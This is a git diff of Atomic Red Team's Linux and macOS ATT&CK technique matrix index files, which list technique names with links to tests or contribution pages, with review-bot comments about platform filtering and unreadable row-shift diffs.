| [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Local Accounts 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | 
+| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | +| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | +| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | | | | | | | 
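Review bot: the persistence column of this matrix solicits tests for Office Template Macros, Office Test, Outlook Forms, Outlook Home Page, Outlook Rules and ROMMONkit, which ATT&CK scopes to Windows/Office 365 or to network devices, while the same column's other rows (RC Scripts, Systemd Service, XDG Autostart Entries, Trap) show this is the Linux matrix. A "CONTRIBUTE A TEST" link for an Outlook rule on Linux cannot be acted on, so the generator's platform filter appears to admit techniques whose ATT&CK platform list does not include the matrix's platform; suggest filtering each column on that platform list before emitting the row, or, if the inclusion is deliberate, saying so under the matrix heading so contributors do not chase untestable combinations.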
@@ -49,10 +53,10 @@ | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Trap](../../T1546.005/T1546.005.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | 
| | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index 952efc86..b4352dce 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md 
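Review bot: the four removed/added row pairs in this hunk differ only because the persistence column gained "Unix Shell Configuration Modification" (linked to T1546.004) and "XDG Autostart Entries", which pushes "Valid Accounts" and "Web Shell" down a row; the defense-evasion cells beside them (Patch System Image, Pluggable Authentication Modules, Port Knocking, Pre-OS Boot) are unchanged, so the diff records a cascade rather than the change itself. Because every "[CONTRIBUTE A TEST]" cell links to the same URL and carries no technique ID, a reader cannot confirm which entry is new, or tell the several "Valid Accounts" and "Local Accounts" cells apart, without counting rows against the other columns. Suggest embedding the ID in each cell, e.g. `Valid Accounts (T1078) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)`, or putting the technique in the contribute link itself, so that matrix diffs become self-describing. The T1546.004 link under its new name is consistent with the macOS hunk below, which drops the same ID under the old label ".bash_profile and .bashrc".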
@@ -1,46 +1,48 @@ # macOS Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric 
Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
[Keychain](../../T1555.001/T1555.001.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud 
Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | User 
Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | -| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture 